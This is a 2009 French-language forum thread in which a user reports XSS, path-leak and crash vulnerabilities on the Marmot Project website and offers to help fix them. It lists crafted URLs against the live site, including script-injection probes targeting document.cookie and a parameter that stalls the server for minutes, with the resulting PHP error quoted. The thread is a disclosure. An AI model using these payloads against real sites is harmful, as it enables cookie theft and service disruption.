Marmot Project
Forum du projet marmotte
Vous n'êtes pas identifié.
#1 29-08-2009 16:26:25
- Amodio
- Fausse Marmotte
- Date d'inscription: 29-08-2009
- Messages: 5
Failles sécurité sur le site web
Bonjour à tous,
De nombreux scripts (pour ne pas dire tous) sur votre site présentent des failles de sécurité (XSS, path leak, et sûrement d'autres), voici quelques liens qui les montre :
Code:
http://marmot.gruk.org/membre-'.html http://marmot.gruk.org/Classement-general-des-membres-commence-400--donnees-par-page-100--pays---trier-par-D'istance.html http://marmot.gruk.org/Classement-general-des-membres-commence-400--donnees-par-page-100--pays-'--trier-par-Distance.html http://marmot.gruk.org/Classement-general-des-membres-commence-200--donnees-par-page-100--pays-";%253Cscript%253Ealert(document.cookie)%253C/script%253E--trier-par-Distance.html plantage http://marmot.gruk.org/Classement-general-des-membres-commence-0--donnees-par-page--1--pays---trier-par-Distance.html http://marmot.gruk.org/Classement-general-des-membres-commence-0--donnees-par-page-100--pays---trier-par-Distance%2520U.html http://marmot.gruk.org/Classement-general-des-membres-commence-0--donnees-par-page-100--pays---trier-par-%253Cscript%253Ealert(document.cookie)%253C/script%253E.html
Je peux vous aider à les combler pour cela tenez-moi informé.
Cordialement,
Amodio
Edit: Celle-ci :
Code:
http://marmot.gruk.org/Classement-general-des-membres-commence-0--donnees-par-page--1--pays---trier-par-Distance.html
est intéressante, le site ne répond plus pendant quelques minutes !
C'est le serveur MYSQL qui a l'air de planter, cf le message d'erreur obtenu:
Code:
Fatal error: Maximum execution time of 120 seconds exceeded in /[...]/Cl_membres_v4.php on line 232
Dernière modification par Amodio (29-08-2009 16:31:11)
Hors ligne
#2 31-08-2009 13:16:50
- Urbanspirit
- Fausse Marmotte
- Date d'inscription: 16-12-2008
- Messages: 15
Re: Failles sécurité sur le site web
et bah ^^
sympa de proposer tes aptitudes en hacking et sécurité 
mais bon vu le peu de personne passant sur le forum autant direct envoyer un mail au créateur du site ou tout du moins a son webmasteur
Hors ligne
#3 31-08-2009 21:12:08
- Amodio
- Fausse Marmotte
- Date d'inscription: 29-08-2009
- Messages: 5
Re: Failles sécurité sur le site web
Désolé mais j'ai bien cherché et je n'ai trouvé aucun e-mail de contact.. à moins de passer par le forum.
Hors ligne